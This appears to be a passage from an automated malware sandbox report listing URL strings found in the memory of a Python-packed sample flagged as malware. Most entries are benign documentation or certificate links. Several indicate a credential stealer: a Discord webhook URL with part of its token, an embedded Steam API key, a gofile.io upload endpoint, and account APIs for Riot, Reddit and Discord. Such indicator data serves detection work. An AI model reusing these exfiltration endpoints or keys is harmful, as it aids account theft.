00000000.00000003.2125684536.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124729226.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120921532.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 
00000000.00000003.2125084062.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120702838.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120555468.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120845442.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120211904.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120482711.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120115665.000002BD86720000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125264112.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125808279.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120382829.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2119928471.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120773656.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2119865961.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2126005023.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120319305.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120619487.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2123951938.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124343863.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125684536.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124729226.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120921532.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 
00000000.00000003.2125084062.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120702838.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120555468.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120845442.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120211904.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120482711.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120115665.000002BD86720000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125264112.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125808279.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120382829.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120619487.000002BD8672C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2119928471.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120773656.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2119865961.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120921532.000002BD8672C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120482711.000002BD8672C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2126005023.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120319305.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120619487.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2123951938.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124244235.000002BD86730000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 
00000000.00000003.2124343863.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125684536.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124729226.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120921532.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125084062.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120702838.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120555468.000002BD86720000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124244235.000002BD86730000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124244235.000002BD86724000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125264112.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125808279.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120382829.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120619487.000002BD8672C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2119928471.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120773656.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2119865961.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120921532.000002BD8672C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120482711.000002BD8672C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2126005023.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120319305.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120619487.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2123951938.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124343863.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125684536.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124729226.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120921532.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125084062.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120702838.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120555468.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120845442.000002BD86720000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0O
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124244235.000002BD86724000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
            Source: powershell.exe, 00000051.00000002.2305154049.00000260C2A61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2442501130.0000018B474B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://python.org
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2436331270.0000018B472F6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2441263044.0000018B472F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://python.org/
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2442501130.0000018B474B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://python.org:80
            Source: powershell.exe, 00000051.00000002.2305154049.00000260C1181000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124244235.000002BD86724000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124244235.000002BD86724000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124244235.000002BD86724000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
            Source: powershell.exe, 00000051.00000002.2305154049.00000260C28E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: powershell.exe, 00000051.00000002.2305154049.00000260C2A61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000051.00000002.2339941788.00000260D93F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125264112.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125808279.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120382829.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120619487.000002BD8672C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2119928471.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120773656.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2119865961.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120921532.000002BD8672C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120482711.000002BD8672C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2126005023.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120319305.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120619487.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2123951938.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124343863.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125684536.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124729226.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120921532.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125084062.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120702838.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120555468.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120845442.000002BD86720000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2434720630.0000018B47384000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2434897742.0000018B47394000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2429494966.0000018B47368000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2139724207.0000018B4738F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2441672563.0000018B47395000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2419006328.0000018B47366000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2441640857.0000018B47386000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2434720630.0000018B47384000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2429494966.0000018B47368000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2419006328.0000018B47366000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://127.0.0.1:8443
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445502760.0000018B482AC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://account.riotgames.com/api/account/v1/user
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://accounts.reddit.com/api/access_token
            Source: powershell.exe, 00000051.00000002.2305154049.00000260C1181000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445935024.0000018B489E4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2433574668.0000018B489E4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2430757947.0000018B489E4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447358540.0000018B49FB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServer
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/IPlayerService/GetSteamLevel/v1/?key=440D7F4D810EF9298D25EDDF37C1F902&s
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446094364.0000018B48C90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/ISteamUser/GetPlayerSummaries/v0002/?key=440D7F4D810EF9298D25EDDF37C1F9
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2434786649.0000018B47625000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2442892896.0000018B47626000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2429421045.0000018B47A65000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445032411.0000018B47EF0000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2418139053.0000018B47A05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bugs.python.org/issue37179
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/avatars/
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/avatars/0j9H
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2454825824.00007FFD9DEB1000.00000040.00000001.01000000.00000020.sdmpString found in binary or memory: https://cffi.readthedocs.io/en/latest/using.html#callbacks
            Source: powershell.exe, 00000051.00000002.2305154049.00000260C2AE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000051.00000002.2305154049.00000260C2AE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000051.00000002.2305154049.00000260C2AE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2122360531.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.drString found in binary or memory: https://cryptography.io
            Source: METADATA0.0.drString found in binary or memory: https://cryptography.io/
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2122360531.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.drString found in binary or memory: https://cryptography.io/en/latest/changelog/
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447890172.00007FFD93461000.00000040.00000001.01000000.0000001F.sdmpString found in binary or memory: https://cryptography.io/en/latest/faq/#why-can-t-i-import-my-pem-file
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2122360531.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.drString found in binary or memory: https://cryptography.io/en/latest/installation/
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2122360531.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.drString found in binary or memory: https://cryptography.io/en/latest/security/
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2441640857.0000018B47386000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2434720630.0000018B47384000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2429494966.0000018B47368000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2419006328.0000018B47366000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://datatracker.ietf.org/doc/html/rfc3986#section-3.2.2
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445502760.0000018B482AC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v8/users/
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446094364.0000018B48C90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2430327032.0000018B487FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1298294465534099557/tV90pThPVvQpjF3HTJU-fplHLi0RLPFiHy4H6WFkFos5MS3
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2434786649.0000018B47625000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2442892896.0000018B47626000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2429421045.0000018B47A65000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445032411.0000018B47EF0000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2418139053.0000018B47A05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.aiohttp.org/en/stable/client_advanced.html#proxy-support
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://docs.github.com/en/account-and-profile/setting-up-and-managing-your-github-profile/customizi
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2437876998.0000018B47955000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2427074219.0000018B478B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2435278581.0000018B47933000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/howto/mro.html
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2437147317.0000018B47A0B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2434152201.0000018B47A05000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2429561498.0000018B47A05000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2444141427.0000018B47A0B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445233438.0000018B48010000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2435080757.0000018B47A0A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2418139053.0000018B47A05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/asyncio-eventloop.html
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2129162473.0000018B451A4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2440940255.0000018B46E70000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2129177837.0000018B4514B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2129162473.0000018B451A4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2129177837.0000018B4514B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2440940255.0000018B46EF8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2129162473.0000018B451A4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2440940255.0000018B46E70000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2129177837.0000018B4514B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2129162473.0000018B451A4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2129177837.0000018B4514B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2440940255.0000018B46EF8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_package
